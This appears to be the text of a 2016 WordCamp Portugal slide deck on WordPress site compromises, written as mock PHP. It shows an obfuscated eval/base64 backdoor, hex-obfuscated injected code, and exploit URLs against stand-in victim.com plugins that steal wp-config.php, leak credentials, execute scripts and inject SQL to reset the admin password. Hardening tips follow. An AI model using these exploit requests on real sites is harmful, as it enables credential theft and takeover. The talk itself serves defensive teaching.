Slides from my talk @ aWordCamp Portugal 2016 about hellodev's experience concerning self-hosted WordPress websites and all the security issues around it. Tips and other useful information inside.
8. /* Primeiros contactos com sites
comprometidos */
<?php
// Silence is golden.
$x =“NFbkn
veorgASDgaskdhfkashdfpwehibvasipdhvaipegaiweHFAPEIgaPIyeiaaipwehgwEG
$34h293gHW)EHG(QHgQ(WEGH#$)GhQªGH)EHGQ3223nfk2n3f23nçkfn2ç34”;
$r=eval(gzinflate(str_rot13(base64_decode($x))));
9.
10. /* Como uma instalação de
WordPress pode ser
comprometida */
// RESPONSIBLE FOR 70% OF THE ATTACKS
$first =“plugin”;
$second =“brute force”;
// OTHER 30%
$other = array(“code”, ”theme”, ”hosting”, ”file permissions”);
/* Source: Wordfence March 2016 */
11. /* O que fazem depois? */
// MOST OF THEM
$first_choice =“deface or take offline”;
$second_choice =“send spam”;
$third_choice =“seo spam”;
$other =“redirect”;
/* Source: Wordfence March 2016 */
12. /* Site comprometido por um
plugin */
// MOST COMMON METHOD
$using_method =“Local File Inclusion (LFI) attack.”;
// EXAMPLE - INJECTED CODE
<?php ${“Gx4cOx42x41x4cx53"}["x69wirx72x63x66x76"]="x69";${"x47Lx4fx42ALx53"}
["x61rx6bmx64z"]="mx6bx41x72r";${"x47x4cOx42x41x4cS"}["ex6ax71x68x68j
x6c"]="x6dx6bx5ftx65x6dp";${"GLOx42x41x4cx53"}["x72x66lx73x65x76x68m
x67x68x79"]="x73tx72x69x70Ax72x72";${"Gx4cx4fx42x41x4cx53"}["v
x72x72x71x78x6dx6dx77y"]="x63ax74x5fcross";${"x47x4cx4fx42ALx53"}
["x72x73x77x70x61x6cx78tx62x79n"]="tex6dx70lx61te";${"GLx4fx42Ax4cx53"}["g
x78x67ycx74x71x73"]="tx69tlx65"; ?>
13. /* Site comprometido por um
plugin */
// EXAMPLE - DOWNLOAD WP-CONFIG.PHP FILE - REVSLIDER
$wpconfig_content = file_get_contents(“http://victim.com/wp-admin/admin-
ajax.php?action=revslider_show_image&img=../wp-config.php”);
/* Source: http://finalphoenix.me/ */
14. /* Site comprometido por um
plugin */
// EXAMPLE - PHPINFO WITH CONSTANTS OR DOWNLOADING BACKUPS OR
UPLOADING FILES
$nonce = file_get_contents(“http://victim.com/wp-admin/admin.php?
action=upgrade-plugin”);
$credentials = file_get_contents(“http://victim.com/wp-admin/admin.php?
action=updraft_ajax_handler&nonce=$nonce”);
/* Source: http://finalphoenix.me/ */
15. /* Site comprometido por um
plugin */
// EXAMPLE - EXECUTING SCRIPTS
$script_to_execute =“phpinfo()”;
$content_of_phpinfo = file_get_contents(“http://victim.com/wp-admin/
admin-post.php?action=wp_ajax_easymedia_imgresize_ajax?imgurl=
$script_to_execute”);
/* Source: http://finalphoenix.me/ */
16. /* Site comprometido por um
plugin */
// EXAMPLE - DATABASE INJECTION (MISSING ASCII TO HTML CODE CONVERSION)
$context = …
$query_to_inject =“update wp_users set password=md5(‘123’) where id=1”;
$chage_password = file_get_contents(“http://victim.com/wp-admin/admin.php?
page=aiowpsec&tab=tab1&orderby=$query_to_inject”, false, $context);
/* Source: http://finalphoenix.me/ */
17. /* Site comprometido por um
plugin */
// HOW TO PROTECT AGAINST ATTACKS THROUGH PLUGINS?
$simple_solution =“update, update, update!”;
$other_tips = array (“dont use old plugins”,“search for news about security
issues”,“take a look at the code”);
18. /* Site comprometido por brute
force */
// PASSWORD GUESSING ATTACK
$tips = array(“dont user obvious usernames”,“dont use simple passwords”,“create a new admin
account”);
$how_to_avoid =“two factor authentication”;
$other_solution = array(“change /wp-admin”,“blacklist IPs trying to login and failing for more than
x times”);
19. /* Site comprometido por outros
motivos */
// SET THE CORRECT PERMISSIONS
$folders =“0755”;
$files =“0644”;
$wp_config =“0444”;
$htaccess =“0444”;
20. /* Site comprometido por outros
motivos */
// SET THE CORRECT .HTACCESS CONTENT
$things_you_can_do = array(“block IPs”,“protect files”,“allow certain file
extensions from wp_content/*”);
21. /* Site comprometido por outros
motivos */
// HAVE LATEST OS UPDATES INSTALLED
if ($i_have_a_server() == true) { update_os(); }